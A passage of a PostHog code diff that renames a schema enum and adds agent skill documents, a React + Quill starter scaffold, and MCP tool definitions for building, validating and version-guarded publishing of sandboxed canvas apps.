     message: string
 }

--- a/products/marketing_analytics/frontend/generated/api.zod.schemas.ts
+++ b/products/marketing_analytics/frontend/generated/api.zod.schemas.ts
@@ -865,12 +865,12 @@ export const UtmMappingSuggestionsResponseApi = zod.object({
 export type UtmMappingSuggestionsResponseApi = zod.input<typeof UtmMappingSuggestionsResponseApi>
 export type UtmMappingSuggestionsResponseApiOutput = zod.output<typeof UtmMappingSuggestionsResponseApi>
 
-export const UtmIssueSeverityEnumApi = zod
+export const DiagnosticSeverityEnumApi = zod
     .enum(['error', 'warning'])
     .describe('\* `error` - error\n\* `warning` - warning')
 
-export type UtmIssueSeverityEnumApi = zod.input<typeof UtmIssueSeverityEnumApi>
-export type UtmIssueSeverityEnumApiOutput = zod.output<typeof UtmIssueSeverityEnumApi>
+export type DiagnosticSeverityEnumApi = zod.input<typeof DiagnosticSeverityEnumApi>
+export type DiagnosticSeverityEnumApiOutput = zod.output<typeof DiagnosticSeverityEnumApi>
 
 export const UtmIssueApi = zod.object({
     field: zod.string().describe('The UTM field with the issue (e.g. utm_campaign, utm_source)'),

--- a/products/tasks/skills/building-canvases/SKILL.md
+++ b/products/tasks/skills/building-canvases/SKILL.md
@@ -1,0 +1,63 @@
+---
+name: building-canvases
+description: >
+  Create or edit a PostHog canvas — a sandboxed browser application (data board, document, form,
+  small tool, graphics experiment) stored in PostHog and rendered by the desktop/web app. Use when
+  a task asks to build, generate, update, or fix a canvas, or when a canvas id is given as the
+  publish target. Covers resolving or creating the target canvas, choosing an implementation
+  approach (React + Quill vs plain HTML/browser APIs), the read → edit → validate → publish loop,
+  and which companion canvas skills to load for the details.
+---
+
+# Building canvases
+
+A canvas is a client-side browser application that runs in a sandboxed iframe inside PostHog.
+Its source lives in PostHog — not in a repository — and you read and write it through the
+`desktop-file-system-canvas-*` tools. Never write a canvas to a local file; publishing through
+the tool is what saves it.
+
+## Resolve the target canvas
+
+- If the task names a canvas id (canvas-initiated tasks do), that is the target. Do not create another.
+- Otherwise list candidates with `desktop-file-system-canvases-list` (scope with `channel_id` when the
+  request names a channel) and pick the canvas the request refers to.
+- Only when no existing canvas is the intended target, create one with `desktop-file-system-canvases-create`
+  in the right channel. When you only have a channel name, resolve its id first with
+  `desktop-file-system-list` (channels are the `folder` entries).
+
+## Choose the least complex implementation that meets the request
+
+- **React + Quill** — PostHog data products, dashboards, forms, application-like state, and anything
+  that should look native to PostHog. Load the `building-react-quill-canvases` skill.
+- **Semantic HTML, CSS, and direct browser APIs** — static documents, focused experiments, generative
+  graphics, `<canvas>`/WebGL work where React adds no structure. Load the `building-html-canvases` skill.
+- **Mix them** when appropriate: React can own the application chrome while Three-style code owns a
+  canvas element, or a mostly static page can mount one interactive island.
+
+This is a judgment call, not a persisted mode — ask the user only when the choice changes a
+user-visible requirement you cannot infer.
+
+## The iteration loop
+
+1. Read the current source and version pointer with `desktop-file-system-canvas-source-retrieve`.
+   Remember `current_version_id` — your publish must be guarded on it.
+2. Edit the project files. For any PostHog data the canvas shows, follow the `querying-canvas-data`
+   skill (saved insights loaded via the `ph` SDK — never fetch or your own PostHog client).
+3. Validate with `desktop-file-system-canvas-validate-create` as often as needed and fix every
+   error-severity diagnostic.
+4. Publish the complete project with `desktop-file-system-canvas-publish-create`, passing
+   `expected_current_version_id`. Follow the `validating-and-publishing-canvases` skill for
+   diagnostics and conflict recovery.
+
+Publish once per requested change, when the canvas is ready — not after every micro-edit.
+
+## Current source-project shape
+
+Until the canvas build service ships, a project contains exactly two files:
+
+- `index.html` — a fixed synthetic shell; leave it as returned.
+- `src/canvas.tsx` — the entire application: one React/TSX file whose default export is a component
+  taking no props. All approaches (React UI, semantic HTML, canvas/WebGL) live inside this component.
+
+Dependencies are limited to the platform-pinned set (react, react-dom, @posthog/quill, recharts,
+lucide-react, dayjs); keep the `dependencies` map exactly as the source read returned it.

--- a/products/tasks/skills/building-html-canvases/SKILL.md
+++ b/products/tasks/skills/building-html-canvases/SKILL.md
@@ -1,0 +1,56 @@
+---
+name: building-html-canvases
+description: >
+  Author a PostHog canvas with semantic HTML, CSS, and direct browser APIs — documents, articles,
+  generative graphics, 2D canvas and WebGL experiences, and focused experiments where React
+  components add no useful structure. Use after building-canvases has routed a canvas request to a
+  plain-HTML/browser-API implementation. Covers the thin component wrapper the current runtime
+  requires, styling and theming without Quill, drawing surfaces, and animation/cleanup patterns.
+---
+
+# Building HTML canvases
+
+Some canvases are documents or graphics programs, not applications: a written report, a diagram,
+a generative-art piece, a WebGL scene. For these, semantic HTML, CSS, and direct browser APIs are
+the right tools — don't force Quill components or React state onto a static page.
+
+## The wrapper the current runtime requires
+
+Until the canvas build service ships, every canvas is mounted as one React component
+(`src/canvas.tsx`, default export, no props). Keep the React layer as a thin shell and write the
+experience in HTML/CSS/browser APIs inside it:
+
+- A document is JSX that is effectively semantic HTML — `<article>`, headings, lists, tables,
+  figures — with a `<style>` block for typography and layout. Write real, specific copy.
+- A drawing/WebGL program renders a `<canvas>` element and drives it imperatively from a
+  `useEffect` via a ref: get the 2D/WebGL context, run the setup and render loop there.
+- Clean up in the effect's return: cancel `requestAnimationFrame` loops, remove listeners, and
+  release contexts, so theme switches and remounts don't leak or double-run.
+- Mixing tiers is fine: a mostly static page can mount one interactive island, and a data board
+  can hand a chart's `<canvas>` to imperative code while React owns the chrome.
+
+The import allowlist still applies (react, react-dom, @posthog/quill, recharts, lucide-react,
+dayjs) — browser globals (`document`, `CanvasRenderingContext2D`, `WebGLRenderingContext`,
+`requestAnimationFrame`, `IntersectionObserver`, Web Audio, etc.) need no import. Three.js and
+other npm graphics libraries are not yet loadable; write against raw WebGL or 2D canvas until the
+build pipeline's dependency admission ships.
+
+## Styling and theme without Quill
+
+- Use Tailwind utilities and/or a `<style>` block (keyframes and complex selectors are fine).
+- The host toggles a `.dark` class on the document root when the user's PostHog theme changes.
+  Define your colors as CSS variables under `:root { … }` with overrides under `html.dark { … }`,
+  or use theme token utilities (`bg-background`, `text-foreground`, `border-border`) — never a
+  light-only hardcoded color.
+- For canvas/WebGL drawing colors, read the resolved token at runtime
+  (`getComputedStyle(document.documentElement).getPropertyValue("--primary")`) or your own CSS
+  variables, and re-read on theme change if the scene is long-lived.
+
+## Rules that still apply
+
+- No `fetch()`/`XMLHttpRequest`, no `<script>` tags, no dynamic `import()`, no remote assets —
+  the sandbox blocks them. PostHog data comes only through the `ph` bridge (see the
+  `querying-canvas-data` skill), including `ph.capture` for interaction analytics.
+- External links go through `ph.openExternal(url)` (posthog.com origins only), from a user
+  interaction.
+- Validate and publish through the canvas tools as described in `validating-and-publishing-canvases`.

--- a/products/tasks/skills/building-react-quill-canvases/SKILL.md
+++ b/products/tasks/skills/building-react-quill-canvases/SKILL.md
@@ -1,0 +1,77 @@
+---
+name: building-react-quill-canvases
+description: >
+  Author the React + Quill implementation of a PostHog canvas: the single-component contract, the
+  allowed imports, Quill (PostHog's design system) component and composition rules, theme-aware
+  design tokens, loading skeletons, and the in-canvas date picker. Use after building-canvases has
+  routed a canvas request to a React implementation — dashboards, data boards, forms, tools, or any
+  canvas that should look native to PostHog.
+---
+
+# Building React + Quill canvases
+
+The whole application is one React/TSX file (`src/canvas.tsx` in the source project). It must
+`export default` a single React component that takes no props — the host mounts it. Do not import
+react-dom or call createRoot.
+
+Start from the working scaffold in [references/starter-scaffold.md](references/starter-scaffold.md)
+on a first build: it already wires the date picker, theme tokens, per-card skeletons, and correct
+typed-node result reading. Keep that wiring; replace the sample metric and layout.
+
+## Imports
+
+Import only from: `react`, `react-dom`, `react-dom/client`, `@posthog/quill`, `recharts`,
+`lucide-react`, `dayjs`. Anything else — including dynamic `import()`, `require()`, `fetch()`,
+`<script>` tags, or remote code — fails validation. Use `@posthog/quill` for UI, `recharts` for
+charts, `lucide-react` for icons, `dayjs` for dates.
+
+## Quill component rules
+
+A PostHog data board must be built entirely from `@posthog/quill` components — never a native
+control or a styled `<div>` standing in for one:
+
+- Dropdown/picker → `Select` (never a native `<select>`); button → `Button` (never `<button>`);
+  text field → `Input`/`Textarea`; checkbox → `Checkbox`; label → `Label`.
+- Table → `Table` (`TableHeader` > `TableRow` > `TableHead`, then `TableBody` > `TableRow` > `TableCell`);
+  panel → `Card` (`CardHeader` + `CardTitle` + `CardContent`); pill → `Badge`; titles → `Heading`; body → `Text`.
+- The only non-Quill tags allowed are plain layout `<div>`s and `recharts` elements.
+- Quill is built on Base UI: compose compound parts (`Select` + `SelectTrigger`/`SelectContent`/`SelectItem`),
+  use controlled `value` + `onValueChange`, and swap a part's element with the `render` prop
+  (e.g. `<PopoverTrigger render={<Button …/>} />`) instead of wrapping it.
+- Quill components are already themed — never restyle one with Tailwind classes or inline `style`;
+  use their `variant`/`size` props. Put layout utilities (`flex`, `grid`, `gap-4`, `p-4`) on your own
+  wrapper `<div>`s.
+- Buttons: default to `variant="outline"`; `variant="primary"` for the one main action only.
+
+## Styling and theme
+
+- Style with Tailwind utilities and Quill components; reserve inline `style` for genuinely dynamic
+  runtime values (fixed sizes use arbitrary-value utilities like `h-[280px]`).
+- The canvas follows the user's PostHog theme; a `.dark` class on the document root flips at runtime.
+  Color only from the design-token utilities — surfaces `bg-background bg-card bg-muted bg-primary
+bg-success bg-warning bg-info bg-destructive`; text `text-foreground text-muted-foreground
+text-card-foreground`; borders `border-border`. Never a hardcoded hex or light-only color.
+- Status tokens invert the usual convention: the bare token (`bg-success`) is a pale background fill
+  and `-foreground` (`text-success-foreground`) is the strong readable color. Colored text or icons
+  always use the `-foreground` utility; a filled pill pairs `bg-success text-success-foreground`.
+  Prefer the Quill `Badge` (`variant="success"`/`"destructive"`) for deltas so you don't hand-pick.
+- `bg-secondary`, `text-secondary`, `bg-accent`, and `bg-popover` are not defined in the canvas — avoid them.
+- recharts strokes/fills use token CSS variables (`stroke="var(--primary)"`, grid/axes in
+  `var(--border)`/`var(--muted-foreground)`).
+- Write Unicode glyphs (curly quotes, ellipsis, arrows, emoji) as literal characters in JSX —
+  `\uXXXX` escapes render verbatim in JSX text.
+
+## Loading states
+
+Every data point renders a skeleton in its own `Card` while loading or refreshing: `SkeletonText`
+(matching `lines` and text-size `className`) for text/number values, `Skeleton` for blocks/charts.
+Drive `isLoading` off the data calls and set it true again on refresh; never show a blank or a
+jumping layout, and handle the empty/error case.
+
+## Date window
+
+A data board owns its own date control — render Quill's `DateTimePicker` (never a custom Select or
+native date input) inside a `Popover` whose trigger is a Quill `Button`. `PopoverContent` gets
+exactly `className="w-auto p-0"` and nothing is added to `DateTimePicker` beyond
+`value`/`onApply`/`onCancel` (it self-sizes; don't pass `compact` or widths). Re-run every query
+when the window changes — see the `querying-canvas-data` skill for feeding it into `dateRange`.

--- a/products/tasks/skills/building-react-quill-canvases/references/starter-scaffold.md
+++ b/products/tasks/skills/building-react-quill-canvases/references/starter-scaffold.md
@@ -1,0 +1,146 @@
+# Canvas starter scaffold
+
+A known-good baseline for a React + Quill data canvas. It already wires the pieces that are easy
+to get wrong — the date picker (self-sizing, no `compact`), theme-aware tokens, per-card loading
+skeletons, and reading a typed-node result correctly. Start from it on a first build: keep the
+wiring, replace the sample "total events" metric and the layout with what the user asked for.
+Ideally swap the inline `ph.query` typed node for a saved insight loaded with
+`ph.loadInsight(shortId, { dateRange })` (see the `querying-canvas-data` skill).
+
+```tsx
+import React, { useEffect, useState } from 'react'
+import {
+  Button,
+  Card,
+  CardContent,
+  CardHeader,
+  CardTitle,
+  DateTimePicker,
+  Heading,
+  Popover,
+  PopoverContent,
+  PopoverTrigger,
+  quickRanges,
+  SkeletonText,
+} from '@posthog/quill'
+import { RefreshCw } from 'lucide-react'
+import { CartesianGrid, Line, LineChart, ResponsiveContainer, Tooltip, XAxis, YAxis } from 'recharts'
+
+export default function Canvas() {
+  const def = quickRanges.find((r) => r.name === 'Last 30 days') ?? quickRanges[0]
+  const [win, setWin] = useState({
+    start: def.rangeSetter(new Date()),
+    end: new Date(),
+    range: def,
+  })
+  const [open, setOpen] = useState(false)
+
+  const [loading, setLoading] = useState(true)
+  const [total, setTotal] = useState(0)
+  const [series, setSeries] = useState([])
+  // Refresh plumbing: bump this nonce to re-run the data effect on demand.
+  const [nonce, setNonce] = useState(0)
+
+  useEffect(() => {
+    let cancelled = false
+    setLoading(true)
+    // Typed query node, computed by PostHog's own runner so the numbers match
+    // the UI exactly. `event: null` = all events (works on any project).
+    ph.query({
+      kind: 'TrendsQuery',
+      series: [{ kind: 'EventsNode', event: null, name: 'All events', math: 'total' }],
+      dateRange: {
+        date_from: win.start.toISOString(),
+        date_to: win.end.toISOString(),
+      },
+    })
+      .then((res) => {
+        if (cancelled) return
+        // Typed-node result: `results` is an array of SERIES OBJECTS, not rows.
+        const s = res.results[0] ?? {}
+        setTotal(s.count ?? 0)
+        setSeries((s.days ?? []).map((day, i) => ({ day, value: s.data?.[i] ?? 0 })))
+        setLoading(false)
+      })
+      .catch(() => {
+        if (!cancelled) setLoading(false)
+      })
+    return () => {
+      cancelled = true
+    }
+  }, [win, nonce])
+
+  return (
+    <div className="flex flex-col gap-4 p-6">
+      <div className="flex items-center justify-between">
+        <Heading size="xl" className="mb-4">
+          Canvas
+        </Heading>
+        <div className="flex items-center gap-2">
+          <Popover open={open} onOpenChange={setOpen}>
+            <PopoverTrigger render={<Button variant="outline">{win.range.name}</Button>} />
+            {/* PopoverContent needs w-auto p-0 so its default fixed width +
+                padding don't squeeze the self-sizing picker (which clips the
+                quick-range tabs). No other styles on it or the picker. */}
+            <PopoverContent className="w-auto p-0">
+              <DateTimePicker
+                value={win}
+                onApply={(v) => {
+                  setWin(v)
+                  setOpen(false)
+                }}
+                onCancel={() => setOpen(false)}
+              />
+            </PopoverContent>
+          </Popover>
+          <Button variant="outline" disabled={loading} onClick={() => setNonce((n) => n + 1)}>
+            <RefreshCw size={14} className={loading ? 'animate-spin' : undefined} />
+            Refresh
+          </Button>
+        </div>
+      </div>
+
+      <div className="grid gap-4 md:grid-cols-3">
+        <Card size="sm">
+          <CardHeader>
+            <CardTitle>Total events</CardTitle>
+          </CardHeader>
+          <CardContent>
+            {loading ? (
+              <SkeletonText lines={1} className="text-3xl" />
+            ) : (
+              <Heading size="2xl">{total.toLocaleString()}</Heading>
+            )}
+          </CardContent>
+        </Card>
+      </div>
+
+      <Card size="sm">
+        <CardHeader>
+          <CardTitle>Events over time</CardTitle>
+        </CardHeader>
+        <CardContent>
+          {loading ? (
+            <SkeletonText lines={6} />
+          ) : (
+            <div className="h-[280px] w-full">
+              <ResponsiveContainer>
+                <LineChart data={series}>
+                  <CartesianGrid stroke="var(--border)" strokeDasharray="3 3" />
+                  <XAxis dataKey="day" stroke="var(--muted-foreground)" tick={{ fontSize: 12 }} />
+                  <YAxis stroke="var(--muted-foreground)" tick={{ fontSize: 12 }} />
+                  <Tooltip />
+                  <Line type="monotone" dataKey="value" stroke="var(--primary)" dot={false} strokeWidth={2} />
+                </LineChart>
+              </ResponsiveContainer>
+            </div>
+          )}
+        </CardContent>
+      </Card>
+    </div>
+  )
+}
+```
+
+Note: `ph` is a global the host injects into the sandbox (`window.ph`) — do not import it, and do
+not import or initialize posthog-js.

--- a/products/tasks/skills/querying-canvas-data/SKILL.md
+++ b/products/tasks/skills/querying-canvas-data/SKILL.md
@@ -1,0 +1,70 @@
+---
+name: querying-canvas-data
+description: >
+  Get PostHog data into a canvas correctly: the host-injected `ph` SDK (loadInsight, query,
+  capture, openExternal, navigate), the data hierarchy (saved insights first, typed query nodes
+  second, inline HogQL last), per-insight-type result shapes, date-range wiring, and event capture
+  from a canvas. Use whenever a canvas shows metrics, charts, tables, or any PostHog data, or
+  needs to send analytics events.
+---
+
+# Querying canvas data
+
+The global `ph` object (injected by the host — never imported, never initialized) is the only way
+a canvas talks to PostHog. Credentials stay in the host; `fetch()`, posthog-js, and hand-rolled
+clients fail in the sandbox.
+
+## Data hierarchy — back every metric with a saved insight
+
+1. **Preferred — save an insight, load it by reference.** Use the PostHog MCP insight tools to
+   create/save an insight that computes the metric with an insight query type (TrendsQuery,
+   FunnelsQuery, RetentionQuery, PathsQuery, or the web-analytics kinds WebOverviewQuery /
+   WebStatsTableQuery — not raw SQL). Confirm its numbers, note the `short_id`, and render it with
+   `await ph.loadInsight(shortId, { dateRange })`. These are proven queries — numbers match the
+   PostHog UI exactly (sessionization, unique users, breakdowns, bounce rate). Never fabricate a
+   query or guess event/property names; discover and save them via MCP first.
+2. **Secondary — an ad-hoc typed node**: `ph.query({ kind: "TrendsQuery", series: [...], dateRange: {...} })`
+   when saving an insight genuinely doesn't fit.
+3. **Last resort — inline HogQL**: `ph.query("SELECT …")`, only when no insight kind can express
+   the metric; you then own the SQL and its date window.
+
+For web-analytics boards specifically, use the web-analytics query kinds — raw HogQL subtly gets
+bounce rate, sessionization, channel attribution, and unique-visitor counts wrong.
+
+## Result shapes — read them correctly or every value renders 0
+
+- **Trends-style results** (insight query types, via `ph.loadInsight` or a typed node): `results`
+  is an array of **series objects**, not rows. Each series has `data: number[]` (per interval),
+  `days: string[]` (ISO), `labels: string[]`, `count` (sum), `aggregated_value` (single-value
+  total), `label`, and optional `compare_label: "current" | "previous"`. A KPI total is
+  `results[0].count` (or `.aggregated_value`); a line chart plots `results[0].data` over
+  `results[0].days`. With a compare period, find the prior series by `compare_label === "previous"`
+  — never by index. `columns` is empty here.
+- **SQL results**: `{ columns: string[], results: rows[][] }` — each row an array of cell values in
+  `columns` order.
+
+Load data in `useEffect` with `useState`, show a loading state, and handle empty/error. Aggregate
+in the query; never fetch raw event dumps.
+
+## Date windows
+
+- Pass the canvas's date-picker window straight into `dateRange`:
+  `ph.loadInsight(shortId, { dateRange: { date_from: win.start.toISOString(), date_to: win.end.toISOString() } })`
+  — the saved insight re-scopes to the window with no time SQL. Typed nodes take the same
+  `dateRange`. Re-run every query when the window changes.
+- A saved **SQL** insight may ignore `dateRange` (its window lives inside the SQL) — a reason to
+  prefer insight query types.
+- Inline HogQL escape hatch only: never bake `now()` or a hardcoded INTERVAL. Compute unix bounds
+  (`Math.floor(win.start.getTime() / 1000)`) and write half-open
+  `timestamp >= toDateTime(fromUnix) AND timestamp < toDateTime(toUnix)`. Prior period = the
+  equal-length window immediately before; bucket with `toStartOfDay`/`toStartOfHour`.
+
+## Side effects
+
+- `ph.capture(event, properties?, distinctId?)` — analytics events for interactions
+  (fire-and-forget). Session replay, `$session_id`, and person attribution are handled by the
+  host automatically; never roll your own capture.
+- `ph.openExternal(url)` — opens `https://posthog.com` / `*.posthog.com` URLs only, and only from
+  a user interaction (opens outside focus are ignored). Don't link elsewhere.
+- `ph.navigate.toTask(id)` / `.toNewTask()` / `.toCanvas(id)` / `.toNewCanvas()` — in-app
+  navigation within the canvas's own channel.

--- a/products/tasks/skills/validating-and-publishing-canvases/SKILL.md
+++ b/products/tasks/skills/validating-and-publishing-canvases/SKILL.md
@@ -1,0 +1,73 @@
+---
+name: validating-and-publishing-canvases
+description: >
+  Validate and publish a canvas source project safely: the source-project shape, reading the
+  current version pointer, iterating on validation diagnostics, guarded publishing with
+  expected_current_version_id, and recovering from a 409 version_conflict without overwriting
+  concurrent work. Use whenever a canvas edit is ready to save, a canvas publish tool returns
+  diagnostics or a conflict, or a task needs to understand canvas version history.
+---
+
+# Validating and publishing canvases
+
+A canvas's source lives in PostHog, versioned per publish. Publishing is guarded: every edit is
+based on a specific version, and the server refuses to overwrite newer work.
+
+## The source project
+
+`desktop-file-system-canvas-source-retrieve` returns:
+
+- `project` — `schemaVersion` (1), `files` (path → content), `entryHtml` (`"index.html"`),
+  `dependencies` (exact platform-pinned versions), `canvasSdkVersion`.
+- `current_version_id` — the version your edits are based on. Keep it; the publish needs it.
+  It is `null` for a canvas that has never been published — pass that `null` on the first publish.
+
+Until the canvas build service ships, edit only `src/canvas.tsx` (the single mounted React
+component) and leave `index.html` and `dependencies` exactly as returned — extra files, new
+dependencies, or version drift fail validation.
+
+## Validate until clean
+
+`desktop-file-system-canvas-validate-create` is side-effect free; call it as often as needed.
+Diagnostics carry `severity`, a stable `code`, a `message`, and (for file-specific problems)
+`path` and `line`:
+
+- `error` diagnostics block publishing — fix all of them. Common ones: `import_not_allowed`
+  (only react, react-dom, @posthog/quill, recharts, lucide-react, dayjs are importable),
+  `forbidden_dynamic_import` / `forbidden_require` / `forbidden_inline_script`,
+  `unsupported_file` (only `index.html` + `src/canvas.tsx` for now), `missing_component`,
+  `dependency_not_admitted` / `dependency_version_mismatch`, and path/size violations.
+- `warning` diagnostics don't block, but heed them: `network_fetch` / `network_xhr` mean the code
+  reaches for the network directly — the sandbox will block it at runtime; use the `ph` bridge.
+
+## Publish guarded
+
+Publish the **complete** project with `desktop-file-system-canvas-publish-create`:
+
+- Always pass `expected_current_version_id` — the `current_version_id` you read (or explicit
+  `null` on a first publish). Unguarded publishes can silently clobber concurrent edits.
+- Include a short `prompt` describing the change; it becomes the version-history entry's label.
+- Pass `name` only to rename the canvas (e.g. a first build of an untitled canvas).
+- Publish once per requested change. If the user asks for another edit afterwards, re-read the
+  source (the head may have moved) and publish again — don't batch unrelated changes into one
+  version, and don't publish work-in-progress after every micro-edit.
+
+The response returns the new `current_version_id`; the canvas app picks the version up
+immediately.
+
+## Recovering from 409 version_conflict
+
+A 409 means the canvas moved past your base — a concurrent publish or a user's undo. The response
+includes the live `current_version_id`. Never retry unguarded to force your version through:
+
+1. Re-read the source with `desktop-file-system-canvas-source-retrieve`.
+2. Re-apply your edits to the fresh source (the new head may contain someone else's changes —
+   preserve them).
+3. Publish again with the new `current_version_id`.
+
+## Version history semantics
+
+Each publish appends a full snapshot and moves the head pointer; users can undo/redo between
+versions in the app. Publishing on top of an undone state discards the redo tail (history stays
+linear), which is why the guard matters: basing your publish on the version you actually read is
+what keeps a user's undo, another agent's publish, and your edit from silently erasing each other.

--- a/services/mcp/definitions/core.yaml
+++ b/services/mcp/definitions/core.yaml
@@ -90,6 +90,92 @@ tools:
                 description: |
                     Optional new display name for the canvas. When set, renames the canvas (the leaf of its path)
                     in place. Omit to leave the name unchanged.
+    desktop-file-system-canvas-publish-create:
+        operation: desktop_file_system_canvas_publish_create
+        enabled: true
+        scopes:
+            - file_system:write
+        annotations:
+            readOnly: false
+            destructive: false
+            idempotent: false
+        title: Publish canvas source project
+        description: >
+            Publish the COMPLETE source project of a canvas as its new head version. The project is validated first —
+            error diagnostics reject the publish (400) and leave the canvas untouched. Pass
+            `expected_current_version_id` (from desktop-file-system-canvas-source-retrieve) so a concurrent edit is
+            rejected with 409 version_conflict instead of overwritten; on conflict, re-read the source, re-apply your
+            edits, and publish against the new head. The canvas lives in PostHog, not on disk — this tool is what saves
+            it.
+        param_overrides:
+            id:
+                description: ID of the canvas whose source to publish.
+    desktop-file-system-canvas-source-retrieve:
+        operation: desktop_file_system_canvas_source_retrieve
+        enabled: true
+        scopes:
+            - file_system:read
+        annotations:
+            readOnly: true
+            destructive: false
+            idempotent: true
+        title: Read canvas source project
+        description: >
+            Read a canvas's source project and its `current_version_id`. Always call this before editing a canvas: edit
+            the returned files, then publish the complete project with desktop-file-system-canvas-publish-create,
+            passing the `current_version_id` you read as `expected_current_version_id` so concurrent edits are not
+            overwritten. Legacy single-file canvases are presented as a synthetic project whose `src/canvas.tsx` holds
+            the React component.
+        param_overrides:
+            id:
+                description: ID of the canvas whose source to read.
+    desktop-file-system-canvas-validate-create:
+        operation: desktop_file_system_canvas_validate_create
+        enabled: true
+        scopes:
+            - file_system:read
+        annotations:
+            readOnly: true
+            destructive: false
+            idempotent: true
+        title: Validate canvas source project
+        description: >
+            Validate a candidate canvas source project without publishing it. Returns structured diagnostics (severity,
+            code, message, file, line); `valid: false` means a publish would be rejected. Side-effect free — call it as
+            often as needed while iterating, and fix every error-severity diagnostic before publishing.
+        param_overrides:
+            id:
+                description: ID of the canvas the project is for.
+    desktop-file-system-canvases-create:
+        operation: desktop_file_system_canvases_create
+        enabled: true
+        scopes:
+            - file_system:write
+        annotations:
+            readOnly: false
+            destructive: false
+            idempotent: false
+        title: Create canvas
+        description: >
+            Create a new, empty canvas in a channel. Returns the canvas's id and (null) `current_version_id`; give it
+            source by publishing a project with desktop-file-system-canvas-publish-create. Only create a canvas when no
+            existing one is the intended target — list them with desktop-file-system-canvases-list first.
+        param_overrides:
+            channel_id:
+                description: Desktop file-system id of the channel (folder) to create the canvas in.
+    desktop-file-system-canvases-list:
+        operation: desktop_file_system_canvases_list
+        enabled: true
+        scopes:
+            - file_system:read
+        annotations:
+            readOnly: true
+            destructive: false
+            idempotent: true
+        title: List canvases
+        description: >
+            List the project's canvases (newest first, capped at 100), optionally scoped to one channel via
+            `channel_id`. Use this to resolve which canvas a request refers to before reading or publishing source.
     desktop-file-system-context-generation-retrieve:
         operation: desktop_file_system_context_generation_retrieve
         enabled: false

--- a/services/mcp/schema/generated-tool-definitions.json
+++ b/services/mcp/schema/generated-tool-definitions.json
@@ -2764,6 +2764,76 @@
             "readOnlyHint": false
         }
     },
+    "desktop-file-system-canvas-publish-create": {
+        "description": "Publish the COMPLETE source project of a canvas as its new head version. The project is validated first — error diagnostics reject the publish (400) and leave the canvas untouched. Pass `expected_current_version_id` (from desktop-file-system-canvas-source-retrieve) so a concurrent edit is rejected with 409 version_conflict instead of overwritten; on conflict, re-read the source, re-apply your edits, and publish against the new head. The canvas lives in PostHog, not on disk — this tool is what saves it.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "Publish canvas source project",
+        "title": "Publish canvas source project",
+        "required_scopes": ["file_system:write"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": false,
+            "openWorldHint": true,
+            "readOnlyHint": false
+        }
+    },
+    "desktop-file-system-canvas-source-retrieve": {
+        "description": "Read a canvas's source project and its `current_version_id`. Always call this before editing a canvas: edit the returned files, then publish the complete project with desktop-file-system-canvas-publish-create, passing the `current_version_id` you read as `expected_current_version_id` so concurrent edits are not overwritten. Legacy single-file canvases are presented as a synthetic project whose `src/canvas.tsx` holds the React component.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "Read canvas source project",
+        "title": "Read canvas source project",
+        "required_scopes": ["file_system:read"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": true,
+            "openWorldHint": true,
+            "readOnlyHint": true
+        }
+    },
+    "desktop-file-system-canvas-validate-create": {
+        "description": "Validate a candidate canvas source project without publishing it. Returns structured diagnostics (severity, code, message, file, line); `valid: false` means a publish would be rejected. Side-effect free — call it as often as needed while iterating, and fix every error-severity diagnostic before publishing.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "Validate canvas source project",
+        "title": "Validate canvas source project",
+        "required_scopes": ["file_system:read"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": true,
+            "openWorldHint": true,
+            "readOnlyHint": true
+        }
+    },
+    "desktop-file-system-canvases-create": {
+        "description": "Create a new, empty canvas in a channel. Returns the canvas's id and (null) `current_version_id`; give it source by publishing a project with desktop-file-system-canvas-publish-create. Only create a canvas when no existing one is the intended target — list them with desktop-file-system-canvases-list first.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "Create canvas",
+        "title": "Create canvas",
+        "required_scopes": ["file_system:write"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": false,
+            "openWorldHint": true,
+            "readOnlyHint": false
+        }
+    },
+    "desktop-file-system-canvases-list": {
+        "description": "List the project's canvases (newest first, capped at 100), optionally scoped to one channel via `channel_id`. Use this to resolve which canvas a request refers to before reading or publishing source.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "List canvases",
+        "title": "List canvases",
+        "required_scopes": ["file_system:read"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": true,
+            "openWorldHint": true,
+            "readOnlyHint": true
+        }
+    },
     "desktop-file-system-create": {
         "description": "Create a new channel (folder) on the desktop surface. Pass a slash-delimited `path` (parent folders are created automatically) and `type: folder`. A blank instruction set is created for the channel automatically; use the desktop-file-system-instructions-partial-update tool to fill it in.",
         "category": "Core",

--- a/services/mcp/schema/tool-definitions-all.json
+++ b/services/mcp/schema/tool-definitions-all.json
@@ -2807,6 +2807,76 @@
             "readOnlyHint": false
         }
     },
+    "desktop-file-system-canvas-publish-create": {
+        "description": "Publish the COMPLETE source project of a canvas as its new head version. The project is validated first — error diagnostics reject the publish (400) and leave the canvas untouched. Pass `expected_current_version_id` (from desktop-file-system-canvas-source-retrieve) so a concurrent edit is rejected with 409 version_conflict instead of overwritten; on conflict, re-read the source, re-apply your edits, and publish against the new head. The canvas lives in PostHog, not on disk — this tool is what saves it.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "Publish canvas source project",
+        "title": "Publish canvas source project",
+        "required_scopes": ["file_system:write"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": false,
+            "openWorldHint": true,
+            "readOnlyHint": false
+        }
+    },
+    "desktop-file-system-canvas-source-retrieve": {
+        "description": "Read a canvas's source project and its `current_version_id`. Always call this before editing a canvas: edit the returned files, then publish the complete project with desktop-file-system-canvas-publish-create, passing the `current_version_id` you read as `expected_current_version_id` so concurrent edits are not overwritten. Legacy single-file canvases are presented as a synthetic project whose `src/canvas.tsx` holds the React component.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "Read canvas source project",
+        "title": "Read canvas source project",
+        "required_scopes": ["file_system:read"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": true,
+            "openWorldHint": true,
+            "readOnlyHint": true
+        }
+    },
+    "desktop-file-system-canvas-validate-create": {
+        "description": "Validate a candidate canvas source project without publishing it. Returns structured diagnostics (severity, code, message, file, line); `valid: false` means a publish would be rejected. Side-effect free — call it as often as needed while iterating, and fix every error-severity diagnostic before publishing.",
+        "category": "Core",
+        "feature": "core",
